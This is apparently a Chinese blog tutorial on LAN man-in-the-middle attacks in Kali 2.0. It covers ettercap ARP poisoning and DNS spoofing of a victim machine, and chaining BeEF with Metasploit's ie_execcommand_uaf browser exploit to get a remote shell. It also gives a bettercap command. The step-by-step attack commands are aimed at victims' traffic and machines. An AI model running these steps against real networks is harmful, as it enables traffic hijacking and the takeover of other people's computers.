kali?2.0下的中間人攻擊

圖片發(fā)自簡(jiǎn)書App



前言,提起中間人攻擊,首先我們會(huì)想到老牌的ettercap,今天我們來(lái)介紹幾種內(nèi)網(wǎng)中間人攻擊的工具

  ettercap,bettercap,mitmf(當(dāng)然還需要beef和metasploit配合,效果更佳)

  0x01 ettercap

  ettercap是LINUX下一個(gè)強(qiáng)大的 欺騙工具,當(dāng)然WINDOWS也能用,你能夠用飛一般的速度創(chuàng)建和發(fā)送偽造的包.讓你發(fā)送從網(wǎng)絡(luò)適配器到應(yīng)用軟件各種級(jí)別的包.綁定監(jiān)聽數(shù)據(jù)到一個(gè)本地端口:從一個(gè)客戶端連接到這個(gè)端口并且能夠?yàn)椴恢赖膮f(xié)議解碼或者把數(shù)據(jù)插進(jìn)去(只有在arp為基礎(chǔ)模式里才能用)

  metasploit配合beef+ettercap局域網(wǎng)dns劫持拿shell

  所用工具:metasploit beef ettercap

  首先我們通過(guò)

  ettercap -G 打開我們的ettercap工具


圖片發(fā)自簡(jiǎn)書App



指定網(wǎng)卡 Sniff -> Unified sniffing -> Ok


然后通過(guò) Hosts->Scan for hosts 掃描一下局域網(wǎng)的機(jī)器,通過(guò) Hosts->Hosts list 顯示出來(lái),如圖


其中 192.168.2.1為網(wǎng)關(guān),192.168.2.105為受害機(jī)器

  我們選中192.168.2.105 Add to Target 1

  選中網(wǎng)關(guān) 192.168.2.1 Add to Target 2

  如圖


選中 Mitm -> Arp poisoning -> 勾選Sniff remote connections 點(diǎn)ok 如圖


選中 Plugins -> Manage the Plugins -> 雙擊 dns_spoof


這樣我們就完成了受害機(jī)器的dns劫持過(guò)程,我們修改一下

  vim /etc/ettercap/etter.dns


使其無(wú)論打開什么網(wǎng)址,其實(shí)打開的都是 192.168.1.104 ok 一切準(zhǔn)備就緒,我們開始運(yùn)行ettercap 如圖:


好了,我們?cè)谑芎C(jī)器了ping一下,看看是否劫持成功


沒(méi)有問(wèn)題,所有的網(wǎng)址都沒(méi)劫持到192.168.2.104上

  接下來(lái),我們使用metasploit 和 beef 工具,利用xp下的ie漏洞拿shell

  剛開始的時(shí)候,需要beef和metasploit關(guān)聯(lián)一下

  我們配置一下

  vim /usr/share/beef-xss/config.yaml


開啟metasploit 拓展

  然后配置一下拓展下的metasploit配置文件

  vim /usr/share/beef-xss/extensions/metasploit/config.yaml


把ip填寫成攻擊機(jī)器的ip,把metasploit路徑填上,保存.

  這就完成了beef和metasploit的關(guān)聯(lián)

  然后把metasploit的服務(wù)開啟,

  由于使用PostgreSQL作為數(shù)據(jù)庫(kù),因此,必須先運(yùn)行它。

  root@kali:~# service postgresql start

  啟動(dòng)Metasploit服務(wù)

  root@kali:~# service metasploit start

  在命令行下用msfconsole把控制臺(tái)打開,接著加載beEF。所用命令為:“l(fā)oad msgrpc ServerHost=192.168.2.104 Pass=abc123”


下面我們來(lái)啟動(dòng)beef

  cd /usr/share/beef-xss/ ./beef -x

  我們看到 metasploit 已經(jīng)加載進(jìn)來(lái)了


我們通過(guò) http://192.168.2.104:3000/ui/panel 打開beef界面,用戶名和密碼都是beef


好了,現(xiàn)在一切都已經(jīng)準(zhǔn)備好,讓我們用php編寫一個(gè)程序,去搞shell吧

  vim /var/www/index.php

  我們?cè)龠M(jìn)入msf

  use exploit/windows/browser/ie_execcommand_uaf set SRVHOST 192.168.2.104 set URIPATH / exploit

  這樣就完成了監(jiān)聽,一旦目標(biāo)機(jī)器打開網(wǎng)站


給他一個(gè)跳轉(zhuǎn),讓它跳轉(zhuǎn)到 http://192.168.2.104:8080

  看一眼我們的metaspolt 已經(jīng)拿到了


使用sessions -i id號(hào) 控制目標(biāo)機(jī)器

  好了 最后一張圖 完結(jié) 累死


0x02 bettercap

  bBetterCap是一個(gè)功能強(qiáng)大、模塊化、輕便的MiTM框架,可以用來(lái)對(duì)網(wǎng)絡(luò)開展各種類型的中間人攻擊(Man-In-The-Middle)。它也可以幫你實(shí)時(shí)地操作HTTP和HTTPS流量,以及其他更多功能。

  bettercap -I eth0 -X

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請(qǐng)聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時(shí)請(qǐng)結(jié)合常識(shí)與多方信息審慎甄別。
平臺(tái)聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點(diǎn),簡(jiǎn)書系信息發(fā)布平臺(tái),僅提供信息存儲(chǔ)服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

  • 線程 線程是用來(lái)執(zhí)行任務(wù)的,線程徹底執(zhí)行完任務(wù)A才能去執(zhí)行任務(wù)B。為了同時(shí)執(zhí)行兩個(gè)任務(wù),產(chǎn)生了多線程。 進(jìn)程 進(jìn)程...
    流水點(diǎn)點(diǎn)閱讀 331評(píng)論 2 0
  • I’m just a little bit caught in the middle 我有點(diǎn)兒左右為難 Life ...
    67fbaec5208f閱讀 236評(píng)論 0 0
  • 前幾天回到爺爺家隨手拍了一些風(fēng)景 因?yàn)椴皇菍I(yè)攝影 所以只是自己欣賞 隨手一拍的小貓 你需要仔細(xì)尋找它 是不是很可...
    浪里個(gè)浪Olivia閱讀 147評(píng)論 0 1

友情鏈接更多精彩內(nèi)容